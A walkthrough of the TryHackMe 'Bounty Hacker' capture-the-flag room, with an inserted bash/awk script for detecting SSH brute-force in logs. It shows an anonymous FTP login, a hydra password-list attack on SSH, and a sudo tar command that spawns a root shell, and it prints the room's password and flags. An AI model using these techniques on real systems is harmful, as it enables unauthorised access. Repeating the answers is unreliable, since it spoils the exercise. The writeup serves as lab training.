TryHackMe: Bounty Hacker CTF
Hello everyone, this is a simple and straightforward writeup on how I completed the TryHackMe | Bounty Hacker CTF.
You can find the room here.
After deploying the machine, we run an nmap scan against the target IP. I usually like to do a null scan first.
nmap -sN <TARGET_IP>
Output:
No results. We next move to the SYN scan.
nmap -sS -sV <TARGET_IP>
We found three open ports. Awesome!!
We log in anonymously to the FTP service using the following command, entering ‘anonymous’ as the Name when prompted:
ftp <TARGET_IP>
We then list all the files and download them to our local machine.
ftp> ls
ftp> get locks.txt
ftp> get tasks.txt
We then look at the contents of tasks.txt.
So, after exiting ftp:
cat tasks.txt
Output:
Q. Who wrote the task list?
Ans: lin
Q. Next, what service can we bruteforce with the textfile found?
Ans: ssh
This is because there is only one other port aside from ftp, and that is ‘ssh’.
Now we have a rough idea of who the user might be (i.e. lin).
So let's use this information, together with the file locks.txt, which looks like a password list, to brute-force our way into ssh.
We will be using hydra for this:
hydra -l lin -P locks.txt <TARGET_IP> ssh
Output:
Q. What is the users password?
Ans. RedDr4gonSynd1cat3
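On the target's side, a password-list run like the hydra one above appears in the sshd log as a burst of failed passwords for one user from one source, followed by an accepted password. The following is an added example, not part of the original writeup, that flags that pattern; the log lines are constructed and the function names sample_log and detect_bruteforce are hypothetical.

```shell
#!/usr/bin/env bash
# Constructed sshd auth.log lines (not taken from the room): three failures
# for user lin from one source, unrelated noise, then a successful login.
sample_log() {
cat <<'EOF'
Jan 10 12:00:01 host sshd[1001]: Failed password for lin from 192.0.2.5 port 40001 ssh2
Jan 10 12:00:02 host sshd[1002]: Failed password for lin from 192.0.2.5 port 40002 ssh2
Jan 10 12:00:03 host sshd[1003]: Failed password for lin from 192.0.2.5 port 40003 ssh2
Jan 10 12:00:04 host sshd[1004]: Failed password for invalid user admin from 192.0.2.9 port 50001 ssh2
Jan 10 12:00:05 host sshd[1005]: Accepted password for lin from 192.0.2.5 port 40004 ssh2
Jan 10 12:05:00 host sshd[1010]: Accepted password for lin from 192.0.2.7 port 41000 ssh2
EOF
}

# detect_bruteforce THRESHOLD
# Reads sshd log lines on stdin and prints "user source failures" for every
# accepted password login that was preceded by at least THRESHOLD failed
# passwords for the same user from the same source address.
detect_bruteforce() {
  awk -v threshold="$1" '
    / sshd\[[0-9]+\]: Failed password for / {
      # Handles both "for NAME from IP" and "for invalid user NAME from IP".
      for (i = 1; i <= NF; i++) if ($i == "from") { user = $(i-1); src = $(i+1) }
      fails[user " " src]++
      next
    }
    / sshd\[[0-9]+\]: Accepted password for / {
      for (i = 1; i <= NF; i++) if ($i == "from") { user = $(i-1); src = $(i+1) }
      key = user " " src
      if (fails[key] >= threshold) print key, fails[key]
      fails[key] = 0   # start counting again after a successful login
    }
  '
}

sample_log | detect_bruteforce 3
```

A hit from this check means the password was guessed, so the account needs a credential reset and not only a block on the source address.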
Now that we have the credentials, let's ssh into the system.
ssh lin@<TARGET_IP>
Q. user.txt
Ans: THM{CR1M3_SyNd1C4T3}
Now we need to escalate our privileges to look for the root flag.
To do so, we run the following command to list the commands lin can run with sudo:
sudo -l
Output:
Next, we head to gtfobins.github.io and check if we can spawn a root shell using the tar command.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
After running the above command, a root shell is spawned and we now have access to the root flag.
Q. root.txt
Ans: THM{80UN7Y_h4cK3r}